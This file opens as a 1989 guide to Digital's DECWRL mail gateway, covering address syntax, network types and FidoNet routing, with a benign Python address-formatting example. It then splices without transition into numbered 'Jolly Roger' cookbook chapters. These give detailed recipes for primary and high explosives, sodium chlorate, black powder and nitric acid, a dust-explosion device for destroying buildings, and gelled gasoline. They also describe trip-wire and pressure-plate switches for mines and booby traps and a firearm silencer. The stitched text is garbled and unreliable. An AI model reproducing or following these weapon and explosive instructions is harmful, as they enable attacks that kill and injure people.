DECWRL is a mail gateway computer operated by Digital's Western Research Laboratory in Palo Alto, California. Its purpose is to support the interchange of electronic mail between Digital and the "outside world." DECWRL is connected to Digital's Easynet, and also to a number of different outside electronic mail networks. Digital users can send outside mail by sending to DECWRL::"outside-address", and Digital users can also receive mail by having their correspondents route it through DECWRL. The details of incoming mail are more complex, and are discussed below.

It is vitally important that Digital employees be good citizens of the networks to which we are connected. They depend on the integrity of our user community to ensure that tighter controls over the use of the gateway are not required.
The most important rule is "no chain letters," but there are other rules depending on whether the connected network that you are using is commercial or non-commercial.

The current traffic volume (September 1989) is about 10,000 mail messages per day and about 3,000 USENET messages per day. Gatewayed mail traffic has doubled every year since 1983. DECWRL is currently a Vax 8530 computer with 48 megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Telebit) modem ports, and various network connections. They will shortly be upgrading to a Vax 8650 system. They run Ultrix 3.0 as the base operating system.

ADMINISTRATION

The gateway has engineering staff, but no administrative or clerical staff. They work hard to keep it running, but they do not have the resources to answer telephone queries or provide tutorials in its use. They post periodic status reports to the USENET newsgroup dec.general. Various helpful people usually copy these reports to the VAXNOTES "gateways" conference within a day or two.

HOW TO SEND MAIL

DECWRL is connected to quite a number of different mail networks. If you were logged on directly to it, you could type addresses directly, e.g.

    To: strange!foreign!address

But since you are not logged on directly to the gateway, you must send mail so that when it arrives at the gateway, it will be sent as if that address had been typed locally.

* Sending from VMS

If you are a VMS user, you should use NMAIL, because VMS mail does not know how to requeue and retry mail when the network is congested or disconnected. From VMS, address your mail like this:

    To: nm%DECWRL::"strange!foreign!address"

The quote characters (") are important, to make sure that VMS doesn't try to interpret strange!foreign!address itself. If you are typing such an address inside a mail program, it will work as advertised.
If you are using DCL and typing directly to the command line, you should beware that DCL likes to remove quotes, so you will have to enclose the entire address in quotes, and then put two quotes in every place that one quote should appear in the address:

    $ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello"

Note the three quotes in a row after foreign!addr. The first two of them are doubled to produce a single quote in the address, and the third ends the address itself (balancing the quote in front of the nm%).

Here are some typical outgoing mail addresses as used from a VMS system:

    To: nm%DECWRL::"lll-winkin!netsys!phrack"
    To: nm%DECWRL::"postmaster@msp.pnet.sc.edu"
    To: nm%DECWRL::"netsys!phrack@uunet.uu.net"
    To: nm%DECWRL::"phrackserv@CUNYVM.bitnet"
    To: nm%DECWRL::"Chris.Jones@f654.n987.z1.fidonet.org"

* Sending from Ultrix

If your Ultrix system has been configured for it, then you can, from your Ultrix system, just send directly to the foreign address, and the mail software will take care of all of the gateway routing for you. Most Ultrix systems in Corporate Research and in the Palo Alto cluster are configured this way. To find out whether your Ultrix system has been so configured, just try it and see what happens. If it doesn't work, you will receive notification almost instantly.

NOTE: The Ultrix mail system is extremely flexible; it is almost completely configurable by the customer. While this is valuable to customers, it makes it very difficult to write global instructions for the use of Ultrix mailers, because it is possible that the local changes have produced something quite unlike the vendor-delivered mailer. One of the popular changes is to tinker with the meaning of quote characters (") in Ultrix addresses. Some systems consider that these two addresses are the same:

    site1!site2!user@host.dec.com
    "site1!site2!user"@host.dec.com

while others are configured so that one form will work and the other will not.
All of these examples use the quotes. If you have trouble getting the examples to work, please try them again without the quotes. Perhaps your Ultrix system is interpreting the quotes differently.

If your Ultrix system has an IP link to Palo Alto (type "/etc/ping decwrl.dec.com" to find out if it does), then you can route your mail to the gateway via IP. This has the advantage that your Ultrix mail headers will reach the gateway directly, instead of being translated into DECNET mail headers and then back into Ultrix at the other end. Do this as follows:

    To: "alien!address"@decwrl.dec.com

The quotes are necessary only if the alien address contains a ! character, but they don't hurt if you use them unnecessarily. If the alien address contains an "@" character, you will need to change it into a "%" character. For example, to send via IP to joe@widget.org, you should address the mail:

    To: "joe%widget.org"@decwrl.dec.com

If your Ultrix system has only a DECNET link to Palo Alto, then you should address mail in much the same way that VMS users do, save that you should not put the nm% in front of the address:

    To: DECWRL::"strange!foreign!address"

Here are some typical outgoing mail addresses as used from an Ultrix system that has IP access. Ultrix systems without IP access should use the same syntax as VMS users, except that the nm% at the front of the address should not be used.

    To: "lll-winken!netsys!phrack"@decwrl.dec.com
    To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com
    To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com
    To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com
    To: "Chris.Jones@f654.n987.z1.fidonet.org"@decwrl.dec.com

DETAILS OF USING OTHER NETWORKS

All of the world's computer networks are connected together, more or less, so it is hard to draw exact boundaries between them. Precisely where the internet ends and UUCP begins is a matter of interpretation.
For purposes of sending mail, though, it is convenient to divide the network universe into these categories:

Easynet: Digital's internal DECNET network. Characterized by addresses of the form NODE::USER. Easynet can be used for commercial purposes.

Internet: A collection of networks including the old ARPAnet, the NSFnet, the CSnet, and others. Most international research, development, and educational organizations are connected in some fashion to the Internet. Characterized by addresses of the form user@site.subdomain.domain. The internet itself cannot be used for commercial purposes.

UUCP: A very primitive network with no management, built with auto-dialers phoning one computer from another. Characterized by addresses of the form place1!place2!user. The UUCP network can be used for commercial purposes provided that none of the sites through which the message is routed objects to that.

USENET: Not a network at all, but a layer of software built on top of UUCP and Internet.

BITNET: An IBM-based network linking primarily educational sites. Digital users can send to BITNET as if it were part of internet, but BITNET users need special instructions for reversing the process. BITNET cannot be used for commercial purposes.

Fidonet: A network of personal computers. I am unsure of the status of using Fidonet for commercial purposes, nor am I sure of its efficacy.

DOMAINS AND DOMAIN ADDRESSING

There is a particular network called "the Internet;" it is somewhat related to what used to be "the ARPAnet." The Internet style of addressing is flexible enough that people use it for addressing other networks as well, with the result that it is quite difficult to look at an address and tell just what network it is likely to traverse. But the phrase "Internet address" does not mean "mail address of some computer on the Internet" but rather "mail address in the style used by the Internet."
Terminology is even further confused because the word "address" means one thing to people who build networks and something entirely different to people who use them. In this file an "address" is something like "mike@decwrl.dec.com" and not "192.1.24.177" (which is what network engineers would call an "internet address").

The Internet naming scheme uses hierarchical domains, which despite their title are just a bookkeeping trick. It doesn't really matter whether you say NODE::USER or USER@NODE, but what happens when you connect two companies' networks together and they both have a node ANCHOR?? You must, somehow, specify which ANCHOR you mean. You could say ANCHOR.DEC::USER or DEC.ANCHOR::USER or USER@ANCHOR.DEC or USER@DEC.ANCHOR. The Internet convention is to say USER@ANCHOR.DEC, with the owner (DEC) after the name (ANCHOR).

But there could be several different organizations named DEC. You could have Digital Equipment Corporation or Down East College or Disabled Education Committee. The technique that the Internet scheme uses to resolve conflicts like this is to have hierarchical domains. A normal domain isn't DEC or STANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational). These domains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU. This doesn't resolve conflicts completely, though: both Central Michigan University and Carnegie-Mellon University could claim to be CMU.EDU. The rule is that the owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets to decide whether the Electrical Engineering department or the Elementary Education department gets subdomain EE.CMU.EDU.

The domain scheme, while not perfect, is completely extensible. If you have two addresses that can potentially conflict, you can suffix some domain to the end of them, thereby making, say, decwrl.UUCP be somehow different from DECWRL.ENET.
DECWRL's entire mail system is organized according to Internet domains, and in fact we handle all mail internally as if it were Internet mail. Incoming mail is converted into Internet mail, and then routed to the appropriate domain; if that domain requires some conversion, then the mail is converted to the requirements of the outbound domain as it passes through the gateway. For example, they put Easynet mail into the domain ENE.

Username@f.n.z.ifna.org In other words, if I wanted to mail to Silicon Swindler at 1:135/5, the address would be Silicon_Swindler@f5.n135.z1.ifna.org and, provided that your mailer knows the .ifna.org domain, it should get through alright. Apparently, as of the writing of this article, they have implemented a new gateway name called fidonet.org which should work in place of ifna.org in all routings. If your mailer does not know either of these domains, use the above routing but replace the first "@" with a "%" and then afterwards, use either of the following mailers after the "@": CS.ORST.EDU or K9.CS.ORST.EDU (i.e. username%f.n.z.fidonet.org@CS.ORST.EDU [or replace CS.ORST.EDU with K9.CS.ORST.EDU]).
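The DECWRL quoting rules given earlier in this file and the FidoNet routing just described, collected into one added example (not code from the original file or from Digital). The function names and the check_alien rejection policy are assumptions of this example; the gateway names, the relay host and the sample addresses are the ones quoted on the page.

```python
import re

GATEWAY_IP = "decwrl.dec.com"   # IP name of the gateway, as quoted on the page
GATEWAY_DECNET = "DECWRL"       # DECNET node name, as quoted on the page
RELAY = "CS.ORST.EDU"           # relay host the page names for FidoNet mail

# Assumption of this example: a double quote, whitespace or control character
# inside the foreign address would end the quoted part early or start a new
# header line, so such input is rejected rather than embedded.
_UNSAFE = re.compile(r'["\s\x00-\x1f\x7f]')
_FIDO_NODE = re.compile(r"([0-9]+):([0-9]+)/([0-9]+)")   # zone:net/node


def check_alien(addr):
    """Return addr unchanged, or raise ValueError if it cannot be quoted safely."""
    if not addr or _UNSAFE.search(addr):
        raise ValueError("unsafe or empty address: %r" % (addr,))
    return addr


def via_ip(addr):
    """Ultrix host with an IP link: "@" becomes "%", the result is quoted."""
    inner = check_alien(addr).replace("@", "%")
    return '"%s"@%s' % (inner, GATEWAY_IP)


def via_decnet(addr, nmail=False):
    """DECNET link: DECWRL::"addr". VMS users add the nm% (NMAIL) prefix."""
    prefix = "nm%" if nmail else ""
    return '%s%s::"%s"' % (prefix, GATEWAY_DECNET, check_alien(addr))


def dcl_quote(arg):
    """DCL removes quotes: wrap the argument and double each inner quote."""
    return '"' + arg.replace('"', '""') + '"'


def fido_to_internet(name, node, domain="ifna.org"):
    """Map a FidoNet name and zone:net/node to name@fNODE.nNET.zZONE.domain."""
    m = _FIDO_NODE.fullmatch(node)
    if m is None:
        raise ValueError("expected zone:net/node, got %r" % (node,))
    zone, net, fnode = m.groups()
    user = check_alien("_".join(name.split()))   # spaces become underscores
    return "%s@f%s.n%s.z%s.%s" % (user, fnode, net, zone, domain)


def via_relay(addr, relay=RELAY):
    """Mailer that lacks the domain: first "@" becomes "%", then @relay."""
    if "@" not in check_alien(addr):
        raise ValueError("address has no @ to rewrite: %r" % (addr,))
    return addr.replace("@", "%", 1) + "@" + relay


if __name__ == "__main__":
    fido = fido_to_internet("Silicon Swindler", "1:135/5", "fidonet.org")
    for line in (
        via_ip("joe@widget.org"),
        via_decnet("strange!foreign!address", nmail=True),
        dcl_quote(via_decnet("foreign!addr", nmail=True)),
        fido,
        via_relay(fido),
    ):
        print(line)
```
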
The following is a list compiled by Bill Fenner (WCF@PSUECL.BITNET) that was posted on INFONETS DIGEST which lists a number of FIDONET gateways: Net Node Node Name 104 56 milehi.ifna.org 105 55 casper.ifna.org 107 320 rubbs.ifna.org 109 661 blkcat.ifna.org 125 406 fidogate.ifna.org 128 19 hipshk.ifna.org 129 65 insight.ifna.org 143 N/A fidogate.ifna.org 152 200 castle.ifna.org 161 N/A fidogate.ifna.org 369 17 megasys.ifna.org NOTE: The UUCP equivalent node name is the first part of the node name. In other words, the UUCP node milehi is listed as milehi.ifna.org but can be mailed directly over the UUCP network. Another way to mail to FIDONET, specifically for Internet people, is in this format: ihnp4!necntc!ncoast!ohiont!!!user_name@husc6.harvard.edu And for those UUCP mailing people out there, just use the path described and ignore the @husc5.harvard.edu portion. There is a FIDONET NODELIST available on most any FIDONET bulletin board, but it is quite large. ONTYME Previously known as Tymnet, OnTyme is the McDonnell Douglas revision. After they bought out Tymnet, they renamed the company and opened an experimental Internet gateway at ONTYME.TYMNET.COM but this is supposedly only good for certain corporate addresses within McDonnell Douglas and Tymnet, not their customers. The userid format is xx.yyy or xx.y/yy where xx is a net name and yyy (or y/yy) is a true username. If you cannot directly nail this, try: xx.yyy%ONTYME.TYM 130.Sodium Chlorate by the Jolly Roger Sodium Chlorate is a strong oxidizer used in the manufacture of explosives. It can be used in place of Potassium Chlorate. Material Required: · 2 carbon or lead rods (1 in. diameter by 5 in. long) · Salt, or ocean water · Sulfuric acid, diluted · Motor Vehicle · Water · 2 wires, 16 gauge (3/64 in. diameter approx.), 6 ft. long, insulated. · Gasoline · 1 gallon glass jar, wide mouth (5 in. diameter by 6 in. high approx.) 
· Sticks · String · Teaspoon · Trays · Cup · Heavy cloth · Knife · Large flat pan or tray Sources of Carbon or Lead rods: · Dry Cell Batteries (2-« in. diameter by 7" long) or plumbing supply store. Sources of Salt Water: · Grocery store or ocean Sources of Sulfuric Acid: · Motor Vehicle Batteries. Procedure: 1.Mix « cup of salt into the one gallon glass jar with 3 liters (3 quarts) of water. 2.Add 2 teaspoons of battery acid to the solution and stir vigorously for 5 minutes. 3.Strip about 4 inches of insulation from both ends of the two wires. 4.With knife and sticks, shape 2 strips of wood 1 by 1/8 by 1-«. Tie the wood strips to the lead or carbon rods so that they are 1-« inches apart. 5.Connect the rods to the battery in a motor vehicle with the insulated wire. 6.Submerge 4-« inches of the rods in the salt water solution. 7.With gear in neutral position, start the vehicle engine. Depress the accelerator approx. 1/5 of its full travel. 8.Run the engine with the accelerator in this position for 2 hours, then shut it down for 2 hours. 9.Repeat this cycle for a total of 64 hours while maintaining the level of the acid-salt water solution in the glass jar. CAUTION: This arrangement employs voltages which can be quite dangerous! Do not touch bare wire leads while engine is running!! 10.Shut off the engine. Remove the rods from the glass jar and disconnect wire leads from the battery. 11.Filter the solution through the heavy cloth into a flat pan or tray, leaving the sediment at the bottom of the glass jar. 12.Allow the water in the filtered solution to evaporate at room temperature (approx. 16 hours). The residue is approximately 60% or more sodium chlorate which is pure enough to be used as an explosive ingredient. 131.Mercury Fulminate by the Jolly Roger Mercury Fulminate is used as a primary explosive in the fabrication of detonators. It is to be used with a booster explosive such as picric acid or RDX (which are elsewhere in this Cookbook). 
Material Required: · Nitric Acid, 90% conc. (1.48 sp. gr) · Mercury · Ethyl (grain) alcohol (90%) · Filtering material [Paper Towels] · Teaspoon measure (, «, and 1 tsp. capacity)-aluminum, stainless steel or wax coated · Heat Source · Clean wooden stick · Clean water · Glass containers · Tape · Syringe Source of Nitric Acid: · Elsewhere in this Cookbook · Industrial metal processors Source of Mercury: · Thermometers · Mercury switches · Old radio tubes Procedure: 1.Dilute 5 teaspoons of nitric acid with 2-« teaspoons of clean water in a glass container by adding the acid to the water. 2.Dissolve 1/8 teaspoon of mercury in the diluted nitric acid. This will yield dark red fumes. NOTE: It may be necessary to add water, on drop at a time, to the mercury-acid solution in order to start a reaction. · CAUTION: Acid will burn skin and destroy clothing. If any is spilled, wash it away with a large quantity of water. Do NOT inhale fumes! 3.Warm 10 teaspoons of the alcohol in a container until the alcohol feels warm to the inside of the wrist. 4.Pour the metal-acid solution into the warm alcohol. Reaction should start in less than 5 minutes. Dense white fumes will be given off during the reaction. As time lapses, the fumes will become less dense. Allow 10 to 15 minutes to complete reaction. Fulminate will settle to the bottom. · CAUTION: This reaction generates large quantities of toxic, flammable fumes. The process MUST be conducted outdoors or in a well-ventilated area, away from sparks or open flames. DO NOT inhale fumes! 5.Filter the solution through a paper towel into a container. Crystals may stick to the side of the container. If so, tilt and squirt water down the sides of the container until all of the material collects on the filter paper. 6.Wash the crystals with 6 teaspoons of ethyl alcohol. 7.Allow these mercury fulminate crystals to air dry. · CAUTION: Handle dry explosive with great care. Do not scrape or handle it roughly! 
Keep away from sparks or open flames. Store in a cool, dry place. 132.Improvised Black Powder by The Jolly Roger Black powder can be prepared in a simple, safe manner. It may be used as blasting or gun powder. Materials: · Potassium Nitrate, granulated, 3 cups (3/4 liter) · Wood charcoal, powdered, 2 cups · Sulfur, powdered, « cup · Alcohol, 5 pints (2-« liters) (whiskey, rubbing alcohol, etc.) · Water, 3 cups (3/4 liter) · Heat source · 2 buckets - each 2 gallon (7-« liters) capacity, at least one of which is heat resistant (metal, ceramic, etc.) · Flat window screening, at least 1 foot (30 cm) square · Large wooden stick · Cloth, at least 2 feet (60 cm) square Procedure: 1.Place alcohol in one of the buckets. 2.Place potassium nitrate, charcoal, and sulfur in the heat resistant bucket. Add 1 cup water and mix thoroughly with wooden stick until all ingredients are dissolved. 3.Add remaining water (2 cups) to mixture. Place bucket on heat source and stir until small bubbles begin to form. · CAUTION: DO NOT boil mixture. Be sure ALL mixture stays wet. If any is dry, as on sides of pan, it may ignite! 4.Remove bucket from heat and pour mixture into alcohol while stirring vigorously. 5.Let alcohol mixture stand about 5 minutes. Strain mixture through cloth to obtain black powder. Discard liquid. Wrap cloth around black powder and squeeze to remove all excess liquid. 6.Place screening over dry bucket. Place workable amount of damp powder on screen and granulate by rubbing solid through screen. NOTE: If granulated particles appear to stick together and change shape, recombine entire batch of powder and repeat steps 5 & 6. 7.Spread granulated black powder on flat, dry surface so that layer about « inch (1- cm) is formed. Allow to dry. Use radiator, or direct sunlight. This should be dried as soon as possible, preferably in an hour. The longer the drying period, the less effective the black powder. · CAUTION: Remove from heat AS SOON AS granules are dry. 
Black powder is now ready to use. 133.Nitric Acid by The Jolly Roger Nitric Acid is used in the preparation of many explosives, incendiary mixtures, and acid delay timers. It may be prepared by distilling a mixture of potassium nitrate and concentrated sulfuric acid. Material Required: · Potassium Nitrate (2 parts by volume) · CONCENTRATED sulfuric acid (1 part by volume) · 2 bottles or ceramin jugs (narrow necks are preferable) · Pot or frying pan · Heat source (wood, charcoal, or coal) · Tape (paper, electrical, masking, but NOT cellophane!) · Paper or rags IMPORTANT: If sulfuric acid is obtained from a motor vehicle battery, concentrate it by boiling it UNTIL white fumes appear. DO NOT INHALE FUMES. NOTE: The amount of nitric acid produced is the same as the amount of potassium nitrate. Thus, for two tablespoons of nitric acid, use 2 tablespoons of potassium nitrate and 1 tablespoonful of concentrated sulfuric acid. Source of Potassium Nitrate: · Elsewhere in this Cookbook · Drug stores Source of CONCENTRATED sulfuric acid: · Motor vehicle batteries · Industrial plants Procedure: 1.Place dry potassium nitrate in bottle or jug. Add sulfuric acid. Do not fill the bottle more than full. Mix until paste is formed. · CAUTION: DO NOT INHALE FUMES! 2.Wrap paper or rags around necks of two bottles. securely tape necks of two bottles together. Be sure that bottles are flush against each other and that there are no air spaces. 3.Support bottles on rocks or cans so that empty bottle is SLIGHTLY lower than bottle containing paste so that nitric acid that is formed in receiving bottle will not run into other bottle. 4.Build fire in pot or frying pan. 5.Gently heat bottle containing mixture by gently moving fire in and out. As red fumes begin to appear periodically pour cool water over empty receiving bottle. Nitric acid will begin to form in receiving bottle. · CAUTION: Do not overheat or wet bottle containing mixture or it may shatter. 
As an added precaution, place bottle to be heated in heat resistant container filled with sand or gravel. Heat this outer container to produce nitric acid. 6.Continue the above process until no more red fumes are formed. If the nitric acid formed in the receiving bottle is not clear (cloudy) pour it into cleaned bottle and repeat steps 2-6. · CAUTION: Nitric acid should be kept away from all combustibles and should be kept in a SEALED CERAMIC OR GLASS container. DO NOT inhale fumes! 134.Dust Bomb Instructions by The Jolly Roger An initiator which will initiate common material to produce dust explosions can be rapidly and easily constructed. This type of charge is ideal for the destruction of enclosed areas such as rooms or buildings. Material Required: · A flat can, 3 in. (8 cm) in diameter and 1-« in. (3-3/4 cm) high. A 6-« ounce tuna can serves the purpose quite well. · Blasting cap · Explosive · Aluminum (may be wire, cut sheet, flattened can, or powder) · Large nail, 4 in. (10 cm) long · Wooden rod - in. (6 mm) diameter · Flour, gasoline, and powder or chipped aluminum NOTE: Plastic explosive produce better explosions than cast explosives. Procedure: 1.Using the nail, press a hole through the side of the tuna can 3/8 inch to « inch (1 to 1-« cm) from the bottom. Using a rotating and lever action, enlarge the hole until it will accommodate the blasting cap. 2.Place the wooden rod in the hole and position the end of the rod at the center of the can. 3.Press explosive into the can, being sure to surround the rod, until it is 3/4 inch (2 cm) from the top of the can. Carefully remove the wooden rod. 4.Place the aluminum metal on top of the explosive. 5.Just before use, insert the blasting cap into the cavity made by the rod. The initiator is now ready to use. NOTE: If it is desired to carry the initiator some distance, cardboard may be pressed on top of the aluminum to insure against loss of material. 
How to Use: This particular unit works quite well to initiate charges of five pounds of flour, « gallon (1-2/3 liters) of gasoline, or two pounds of flake painters aluminum. The solid materials may merely be contained in sacks or cardboard cartons. The gasoline may be placed in plastic coated paper milk cartons, as well as plastic or glass bottles. The charges are placed directly on top of the initiator and the blasting cap is actuated electrically or by a fuse depending on the type of cap employed. this will destroy a 2,000 cubic feet enclosure (building 10 x 20 x 10 feet). Note: For larger enclosures, use proportionally larger initiators and charges. 135.Carbon-Tet Explosive by The Jolly Roger A moist explosive mixture can be made from fine aluminum powder combined with carbon tetrachloride or tetrachloroethylene. This explosive can be detonated with a blasting cap. Material Required: · Fine aluminum bronzing powder · Carbon Tetrachloride or Tetrachloroethylene · Stirring rod (wood) · Mixing container (bowl, bucket, etc.) · Measuring container (cup, tablespoon, etc.) · Storage container (jar, can, etc.) · Blasting cap · Pipe, can or jar Source of Carbon Tetrachloride: · Paint store · Pharmacy · Fire extinguisher fluid Source of Tetrachloroethylene: · Dry cleaners · Pharmacy Procedure: 1.Measure out two parts aluminum powder to one part carbon tetrachloride or tetrachlorethylene liquid into mixing container, adding liquid to powder while stirring with the wooden rod. 2.Stir until the mixture becomes the consistency of honey syrup. · CAUTION: Fumes from the liquid are dangerous and should not be inhaled. 3.Store explosive in a jar or similar water proof container until ready to use. The liquid in the mixture evaporates quickly when not confined. NOTE: Mixture will detonate in this manner for a period of 72 hours. How to Use: 1.Pour this mixture into an iron or steel pipe which has an end cap threaded on one end. 
If a pipe is not available, you may use a dry tin can or glass jar. 2.Insert blasting cap just beneath the surface of the explosive mix. NOTE: Confining the open end of the container will add to the effectiveness of the explosive. 136.Making Picric Acid from Aspirin by The Jolly Roger Picric Acid can be used as a booster explosive in detonators, a high explosive charge, or as an intermediate to preparing lead picric. Material Required: · Aspirin tablets (5 grains per tablet) · Alcohol, 95% pure · Sulfuric acid, concentrated, (if battery acid, boil until white fumes disappear) · Potassium Nitrate (see elsewhere in this Cookbook) · Water · Paper towels · Canning jar, 1 pint · Rod (glass or wood) · Glass containers · Ceramic or glass dish · Cup · Teaspoon · Tablespoon · Pan · Heat source · Tape Procedure: 1.Crush 20 aspirin tablets in a glass container. Add 1 teaspoon of water and work into a paste. 2.Add approximately 1/3 to « cup of alcohol (100 milliliters) to the aspirin paste; stir while pouring. 3.Filter the alcohol-aspirin solution through a paper towel into another glass container. Discard the solid left in the paper towel. 4.Pour the filtered solution into a glass or ceramic dish. 5.Evaporate the alcohol and water from the solution by placing the dish into a pan of hot water. White powder will remain in the dish after evaporation. · NOTE: The water in the pan should be at hot bath temperature, not boiling, approx 160øF to 180øF. It should not burn the hands. 6.Pour 1/3 cup (80 milliliters) of concentrated sulfuric acid into a canning jar. Add the white powder to the sulfuric acid. 7.Heat canning jar of sulfuric acid in a pan of simmering hot water bath for 15 minutes; then remove jar from the bath. Solution will turn to a yellow-orange color. 8.Add 3 level teaspoons (15 grams) of potassium nitrate in three portions to the yellow-orange solution; stir vigorously during additions. Solution will turn red, then back to a yellow-orange color. 
9.Allow the solution to cool to ambient room temperature while stirring occasionally. 10.Slowly pour the solution, while stirring, into 1- cup (300 milliliters) of cold water and allow to cool. 11.Filter the solution through a paper towel into a glass container. Light yellow particles will collect on the paper towel. 12.Wash the light yellow particles with 2 tablespoons (25 milliliters) of water. Discard the waste liquid in the container. 13.Place articles in ceramic dish and set in a hot water bath, as in step 5, for 2 hours. 137.Reclamation of RDX from C-4 Explosives by the Jolly Roger RDX can be obtained from C-4 explosives with the use of gasoline. It can be used as a booster explosive for detonators or as a high explosive charge. Material Required: · Gasoline · C-4 explosive · 2 - pint glass jars, wide mouth · Paper towels · Stirring rod (glass or wood) · Water · Ceramic or glass dish · Pan · Heat source · Teaspoon · Cup · Tape NOTE: Water, Ceramic or glass dish, pan, & heat source are all optional. The RDX can be air dried instead. Procedure: 1.Place 1-« teaspoons (15 grams) of C-4 explosive in one of the pint jars. Add 1 cup (240 milliliters) of gasoline. · NOTE: These quantities can be increased to obtain more RDX. For example, use 2 gallons of gasoline per 1 cup of C-4. 2.Knead and stir the C-4 with the rod until the C-4 has broken down into small particles. Allow mixture to stand for « hour. 3.Stir the mixture again until a fine white powder remains on the bottom of the jar. 4.Filter the mixture through a paper towel into the other glass jar. Wash the particles collected on the paper towel with « cup (120 milliliters) of gasoline. Discard the waste liquid. 5.Place the RDX particles in a glass or ceramic dish. Set the dish in a pan of hot water, not boiling and dry for a period of 1 hour. · NOTE: The RDX particles may be air dried for a period of 2 to 3 hours. 
138.Egg-based Gelled Flame Fuels by The Jolly Roger The white of any bird egg can be used to gel gasoline for use as a flame fuel which will adhere to target surfaces. Materials Required: Parts by Volume Ingredient How used Common Source 85 Gasoline Motor Fuel Gas Stations Stove Fuel Motor Vehicle Solvent 14 Egg Whites Food Food Store Industrial Farms Processes Any one of the following: 1 Table Salt Food Sea Water Industrial Natural Brine Processes Food Store 3 Ground Coffee Food Coffee Plant Food Store 3 Dried Tea Leaves Food Tea Plant Food Store 3 Cocoa Food Cacao Tree Food Store 2 Sugar Sweetening Sugar Cane Foods Food Store 1 Saltpeter Pyrotechnics Natural (Potassium Nitrate) Explosives Deposits Matches Drug Store Medicine 1 Epsom Salts Medicine Natural Mineral Water Kisserite Industrial Drug Store Processes Food Store 2 Washing Soda Washing Cleaner Food Store (Sal Soda) Medicine Drug Store Photography Photo Supply Store 1 « Baking Soda Baking Food Store Beverages Drug Store Medicines Mineral Waters 1 « Aspirin Medicine Drug Store Food Store Procedure: CAUTION: Make sure that there are no open flames in the area when mixing flame fuels! NO SMOKING!! 1.Separate the egg white from the yolk. This can be done by breaking the egg into a dish and carefully removing the yolk with a spoon. 2.Pour egg white into a jar, bottle, or other container, and add gasoline. 3.Add the salt (or other additive) to the mixture and stir occasionally until gel forms (about 5 to 10 minutes). NOTE: A thicker gelled flame fuel can be obtained by putting the capped jar in hot (65øC) water for about « hour and then letting them cool to room temperature. (DO NOT HEAT THE GELLED FUEL CONTAINING COFFEE!!) 139.Clothespin Switch by The Jolly Roger A spring type clothespin is used to make a circuit closing switch to actuate explosive charges, mines, booby traps, and alarm systems. Material Required: · Spring type clothespin · Sold copper wire -- 1/16 in. 
(2 mm) in diameter · Strong string on wire · Flat piece of wood (roughly 1/8 x 1" x 2") · Knife Procedure: 1.Strip four in. (10 cm) of insulation from the ends of 2 solid copper wires. Scrape the copper wires with pocket knife until the metal is shiny. 2.Wind one scraped wire tightly on jaw of the clothespin, and the other wire on the other jaw. 3.Make a hole in one end of the flat piece of wood using a knife, heated nail or drill. 4.Tie strong string or wire through the hole. 5.Place flat piece of wood between the jaws of the clothespin switch. Basic Firing Circuit: ______________ | |---------------------------\ | initiator |----------\ | strong -------------- | | twine | | \ | _---------_________ | --------- | | \clothespin \ / \ / switch \ / \ / \ / + - ---------- | | | battery| ---------- When the flat piece of wood is removed by pulling the string, the jaws of the clothespin will close, completing the circuit. CAUTION: Do not attach the battery until the switch and trip wire have been emplaced and examined. Be sure that the flat piece of wood is separating the jaws of the switch. 140.Flexible Plate Switch by The Jolly Roger This flexible plate switch is used for initiating emplaced mines and explosives. Material Required: · Two flexible metal sheets: · One approximately 10 in. (25 cm) square · One approximately 10 in. x 8 in. (20 cm) · Piece of wood 10 in. square x 1 in. thick · Four soft wood blocks 1 in. x 1 in. x in. · Eight flat head nails, 1 in. long · Connecting wires · Adhesive tape Procedure: 1.Nail 10 in. by 8 in. metal sheet to 10 in. square piece of wood so that 1 in. of wood shows on each side of the metal. Leave one of the nails sticking up about in. 2.Strip insulation from the end of one connecting wire. Wrap this end around the nail and drive the nail all the way in. 3.Place the four wood blocks on the corners of the wood base. 4.Place the 10 in. square flexible metal sheet so that it rests on the blocks in line with the wood base. 
5.Drive four nails through the metal sheet and the blocks (1 per block) to fasten the sheet to the wood base. A second connecting wire is attached to one of the nails as in step #2. 6.Wrap the adhesive tape around the edges of the plate and wood base. This will assure that no dirt or other foreign matter will get between the plates and prevent the switch from operating. How to use: The switch is placed in a hole in the path of expected traffic and covered with a thin layer of dirt or other camouflaging material. The mine or other explosive device connected to the switch can be buried with the switch or emplaced elsewhere as desired. When a vehicle passes over the switch, the two metal plates make contact closing the firing circuit. 141.Low Signature Systems (Silencers) by The Jolly Roger Low signature systems (silencers) for improvised small arms weapons can be made from steel gas or water pipe and fittings. Material Required: · Grenade Container · Steel pipe nipple, 6 in. (15 cm) long - (see table 1 for diameter) · 2 steel pipe couplings - (see table 2 for dimensions) · Cotton cloth - (see table 2) · Drill · Absorbent cotton Procedure: 1.Drill hole in grenade container at both ends to fit outside diameter of pipe nipple. (see table 1) -> /----------------------\ / | | 2.75 in | ) ( <-holes dia. \ | | -> \-----------------------/ |-----------------------| 5 in. 2.Drill four rows of holes in pipe nipple. Use table 1 for diameter and location of holes. (Note: I suck at ASCII art!) 6 in. |-----------------------------------| _____________________________________ ___ | O O O O O O O O O O O O O O O O O | | C (nom. dia.) ------------------------------------- (size of hole) | \ / (space between) B (dia.) A 3.Thread one of the pipe couplings on the drilled pipe nipple. 4.Cut coupling length to allow barrel of weapon to thread fully into low signature system. Barrel should butt against end of the drilled pipe nipple. 
